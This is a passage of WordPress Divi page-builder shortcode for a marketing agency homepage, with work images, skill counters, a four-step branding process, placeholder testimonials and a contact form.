header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" title_text=\"home-office-07-1\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" 